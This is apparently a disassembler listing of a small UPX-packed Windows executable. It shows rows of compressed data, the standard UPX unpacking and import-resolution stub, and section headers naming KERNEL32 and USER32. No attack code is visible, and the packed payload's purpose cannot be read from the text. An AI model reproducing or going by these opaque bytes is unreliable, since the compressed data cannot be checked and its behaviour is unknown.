dd 6F00224Ah, 0D1D6E1DDh, 0C4434BCAh, 1F490B0Ah, 24C4C346h
dd 0D16B36FFh, 4A4F0F0Eh, 4DCECCC8h, 5B377BCDh, 0CDC6C6F8h
dd 0E4612C3h, 0C5C64E0Fh, 86161BCAh, 0CCC70FFDh, 0C3C8CC4Eh
dd 0B30F4F4Bh, 0B2DD04Ah, 0CD4B1CC1h, 6B4AB35Eh, 6BA1612Fh
dd 4597C9AEh, 1D0D1046h, 560FFFFBh, 0CE4DDD4Dh, 0C6D74C45h
dd 0C94BC44Bh, 0C85F4C4Dh, 79617C5h, 0D8D31AC1h, 35D459C5h
dd 0E0815844h, 2ACCB70Ch, 63CEC54Eh, 0BED7ACC8h, 0C70600B9h
dd 53C648C9h, 0C600EF0Fh, 80322A0h, 80006402h, 0A6C88h
dd 0E5FF9009h, 12058B9h, 7274736Ch, 41797063h, 7D9F21F6h
dd 4169706Dh, 6E656C14h, 31417461h, 0CD3FFB9Fh, 73771465h
dd 6E697270h, 1136674h, 20FFFDF0h, 13011FFFh, 620062Bh
dd 110F0D09h, 2111231Eh, 637375Dh, 0FFFB0F07h, 818BFE5h
dd 100F0C06h, 0C300931h, 10454864h, 600C1816h, 0A4C2510h
dd 7FFB5B0Eh, 41D15B7h, 28133D0Ch, 13651608h, 16063C20h
dd 7E43010Dh, 377F777h, 0C411054h, 1D4F927Dh, 559102Dh
dd 2206753Fh, 0FFFE181Ah, 4108EFFDh, 9132905h, 150B080Ch
dd 0E33001Ah, 32371A0Ah, 3D2F5A42h, 0F7763A32h, 3501FFFFh
dd 10344B3Ah, 15064B08h, 2C381545h, 301B1909h, 9B392E1Dh
dd 0FDDFFFF6h, 1A1E1670h, 60B0C4Eh, 0C340813h, 0C370933h
dd 0C443F11h, 120D430Eh, 0DCF6EDFFh, 16990350h, 627F381Eh
dd 5061B0Ch, 0D90A1612h, 66DBFFF6h, 0C166180h, 2A0C0E24h
dd 0E1E0E18h, 20104B40h, 0FE431010h, 91EFC4Bh, 0EA455000h
dd 4014Ch, 4644A586h, 0FED9ACF7h, 10200E0h, 0C08010Bh
dd 0EF130C1Eh, 9CB60429h, 3105D7Dh, 0B400D30h, 6C330402h
dd 70B3749h, 161E600Ch, 10ECD92Fh, 8406072Bh, 5E5920E5h
dd 503C3254h, 0C900BAC8h, 1CA701ECh, 9B60BE1Eh, 65742E1Fh
dd 1D5B7478h, 6E04EB90h, 23C2EEE3h, 722ECD20h, 0CB612E64h
dd 0B05F6177h, 2223FB03h, 0B024027h, 2E5EECECh, 21C1026h
dd 0F2CF6073h, 2EC02777h, 6F6C6572h, 4F502A63h, 0C94DFB67h
dd 0AC1B4226h, 4A2332h, 39F00000h, 51h, 0FF000048h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_AC = byte ptr -0ACh
pusha
mov esi, offset dword_406000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_407202
; ---------------------------------------------------------------------------
align 8
loc_4071F8: ; CODE XREF: start:loc_407209�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_4071FE: ; CODE XREF: start+B6�j start+CD�j
add ebx, ebx
jnz short loc_407209
loc_407202: ; CODE XREF: start+10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407209: ; CODE XREF: start+20�j
jb short loc_4071F8
mov eax, 1
loc_407210: ; CODE XREF: start+3F�j start+4A�j
add ebx, ebx
jnz short loc_40721B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40721B: ; CODE XREF: start+32�j
adc eax, eax
add ebx, ebx
jnb short loc_407210
jnz short loc_40722C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_407210
loc_40722C: ; CODE XREF: start+41�j
xor ecx, ecx
sub eax, 3
jb short loc_407240
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_4072B2
mov ebp, eax
loc_407240: ; CODE XREF: start+51�j
add ebx, ebx
jnz short loc_40724B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40724B: ; CODE XREF: start+62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_407258
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407258: ; CODE XREF: start+6F�j
adc ecx, ecx
jnz short loc_40727C
inc ecx
loc_40725D: ; CODE XREF: start+8C�j start+97�j
add ebx, ebx
jnz short loc_407268
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407268: ; CODE XREF: start+7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40725D
jnz short loc_407279
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40725D
loc_407279: ; CODE XREF: start+8E�j
add ecx, 2
loc_40727C: ; CODE XREF: start+7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40729C
loc_40728D: ; CODE XREF: start+B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40728D
jmp loc_4071FE
; ---------------------------------------------------------------------------
align 4
loc_40729C: ; CODE XREF: start+AB�j start+C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40729C
add edi, ecx
jmp loc_4071FE
; ---------------------------------------------------------------------------
loc_4072B2: ; CODE XREF: start+5C�j
pop esi
mov edi, esi
mov ecx, 0A1h
loc_4072BA: ; CODE XREF: start+E1�j start+E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_4072BF: ; CODE XREF: start+104�j
cmp al, 1
ja short loc_4072BA
cmp byte ptr [edi], 1
jnz short loc_4072BA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_4072BF
lea edi, [esi+5000h]
loc_4072EC: ; CODE XREF: start+12E�j
mov eax, [edi]
or eax, eax
jz short loc_40732E
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+703Ch]
xchg eax, ebp
loc_407309: ; CODE XREF: start+146�j
mov al, [edi]
inc edi
or al, al
jz short loc_4072EC
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+7040h]
or eax, eax
jz short loc_407328
mov [ebx], eax
add ebx, 4
jmp short loc_407309
; ---------------------------------------------------------------------------
loc_407328: ; CODE XREF: start+13F�j
call dword ptr [esi+7048h]
loc_40732E: ; CODE XREF: start+110�j
add edi, 4
lea ebx, [esi-4]
loc_407334: ; CODE XREF: start+170�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_40735F
cmp al, 0EFh
ja short loc_407352
loc_407341: ; CODE XREF: start+17D�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_407334
; ---------------------------------------------------------------------------
loc_407352: ; CODE XREF: start+15F�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_407341
; ---------------------------------------------------------------------------
loc_40735F: ; CODE XREF: start+15B�j
mov ebp, [esi+7044h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1EFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_407393: ; CODE XREF: start+1B7�j
push 0
cmp esp, eax
jnz short loc_407393
sub esp, 0FFFFFF80h
jmp sub_4029EF
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 408000h
dd 3 dup(0)
dd 8058h, 803Ch, 3 dup(0)
dd 8065h, 8050h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aJW db 'jÉÔw',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aUser32_dll db 'USER32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 74697845h, 636F7250h, 737365h, 73770000h, 6E697270h
dd 416674h, 7000h, 0Ch, 31E2h, 3CFh dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 409000h
align 2000h
_idata2 ends
end start